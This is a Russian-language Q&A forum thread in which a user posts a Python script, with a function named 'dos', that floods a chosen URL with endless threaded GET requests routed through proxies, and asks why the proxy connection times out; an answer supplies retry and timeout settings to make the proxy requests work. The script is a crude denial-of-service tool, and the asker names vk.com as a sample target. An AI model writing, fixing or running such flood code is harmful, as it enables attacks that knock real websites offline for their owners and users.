# Проблема при работе с запросами используя proxy на Python

Tags: python, https, proxy

```
import threading
import requests
import random

proxies = ['103.239.200.186:1337']

def get_session(proxies):
    session = requests.Session()
    proxy = random.choice(proxies)
    session.proxies = {"http": proxy, "https": proxy}
    return session

def dos(target):
    while True:
        try:
            s = get_session(proxies)
            s.get(target, timeout=0.5)
            print("Request sent!")
        except requests.exceptions.ConnectionError as e:
            print("[+] Connection error! " + str(e))


threads = 20

url = input("URL: ")

try:
    threads = int(input("Threads: "))
except ValueError:
    exit("Threads count is incorrect!")

if threads == 0:
    exit("Threads count is incorrect!")

if not url.__contains__("http"):
    exit("URL doesnt contains http or https!")

if not url.__contains__("."):
    exit("Invalid domain")

for i in range(0, threads):
    thr = threading.Thread(target=dos, args=(url,))
    thr.start()
    print(str(i + 1) + " thread started!")
```

Возникла проблема. Писал софт для... Отправки запросов в большом количестве, в общем. На моменте установки proxy появилась ошибка, решения которой я не нашел спустя долгое время. Помогите, пожалуйста. Подскажите, что означает ошибка и как её решить в моём случае.

Вот как выглядит ошибка:

[image: ошибка, выводящаяся в строке 20 после except]

Она в виде текста:

```
[+] Connection error! HTTPSConnectionPool(host='vk.com', port=443): Max retries exceeded with url: /groups (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x0000016DAD035DE0>, 'Connection to 103.239.200.186 timed out. (connect timeout=0.5)'))
```

(для примера взял первый попавшийся сайт для отправки запросов, это не важно)

Comment: А увеличить таймаут пробовали? Может не хватает времени на получение данных. А другие прокси пробовали? Может прокси не рабочая. Да вообще хоть весь список проксей может быть не рабочим.

Comment: @CrazyElf  Пробовал менять прокси. И даже чекал на валид. Таймаут ничем не помогает.

Answer (score 0):

Вот так попробуйте

```py
from urllib3 import Timeout, Retry
from requests import Session
from requests.adapters import HTTPAdapter

s = Session()
s.proxies = {
    'http':  '103.239.200.186:1337',
    'https':  '103.239.200.186:1337'
}

s.mount(
    'https://',
    HTTPAdapter(
        max_retries=Retry(
            connect=20,
            total=40,
            backoff_factor=.005
        ),
    )
)

response = s.get(
    'https://ipinfo.io/ip',
    timeout=Timeout(
        connect=2,
        read=5
    )
)
print(
    response.content
)
# b'103.239.200.186'
```

> Если не изменяет память, то у requests по умолчанию Retry один а Timeout бесконечный
> [Ссылка по теме](https://urllib3.readthedocs.io/en/stable/reference/urllib3.util.html?highlight=retry#urllib3.util.Retry)